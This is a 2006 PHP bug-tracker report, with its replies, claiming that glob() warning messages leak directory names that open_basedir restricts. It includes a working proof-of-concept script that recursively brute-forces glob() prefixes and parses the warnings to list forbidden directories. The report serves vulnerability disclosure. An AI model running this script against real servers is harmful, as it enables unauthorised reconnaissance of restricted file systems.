php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #39339 Bug in warning message when glob() function access to unallowed path.
Submitted: 2006-11-01 22:30 UTC Modified: 2006-11-03 21:22 UTC
From: anton dot kirsanov at gmail dot com Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.1.6 OS: ALL
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: anton dot kirsanov at gmail dot com
New email:
PHP Version: OS:

 

 [2006-11-01 22:30 UTC] anton dot kirsanov at gmail dot com 
Description:
------------
When open_basedir is enabled, glob() function don`t show files in unallowed directories, however in warning message present file or directory name that access is denied. 
If you recursive parse a warning messages for extract pathes, you a get listing of unallowed directories (see POC code). 

I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is equal. 

Reproduce code:
---------------
<?php
	// -----------------------------------------------------
	// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
	// 
	// Description:
	// Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled.
        //
	// Risk:
	// Possible directory listing, when open_basedir is enabled.
	// Testing on PHP 4.4.4, 5.1.6.

	
	error_reporting(E_ALL); 
	ini_set("display_errors", 0); 
	ini_set("track_errors", 1); 

	if(!ini_get('open_basedir'))	
		die('open_basedir not present');

	$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$z = array();

	get_c("/", $z);

        // show contents of root directory
	print_r($z);

	function get_c($path, &$o)
	{
		global $chars;
		for($i=0; $i < strlen($chars); $i++)
		{
			$p = $path . $chars[$i];
			$r = glob($p . "*");
			if(!$r && $php_errormsg)
			{
				if((	preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) ||
					preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]])
				{
					$o[$t[1]] = $t[2];					get_c($p, $o);
				}
			}
		}
	}
?>

Expected result:
----------------
<?php
glob("/*");
?>

Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/) owned ...


Actual result:
--------------
<?php
glob("/*");
?>

----
Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/bin/) owned ...
----

Warning message has been disclose path - /bin/

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2006-11-03 19:40 UTC] iliaa@php.net 
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Everytime PHP fails to open a file due to safe_mode/
open_basedir it returns an error saying cannot open so & so 
due to safe_mode. 

You don't gain the ability to write to files and/or open them, 
so there is no security issue here.
 [2006-11-03 21:22 UTC] anton dot kirsanov at gmail dot com 
sorry, this a bug. 
if i know a fullpath to files in unallowed directories, i`m must used a many others php bugs (some curl bug, zlib compress file read bug) for read unallowed files. this a design bug in security architecture.
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Tue Jul 01 21:01:35 2025 UTC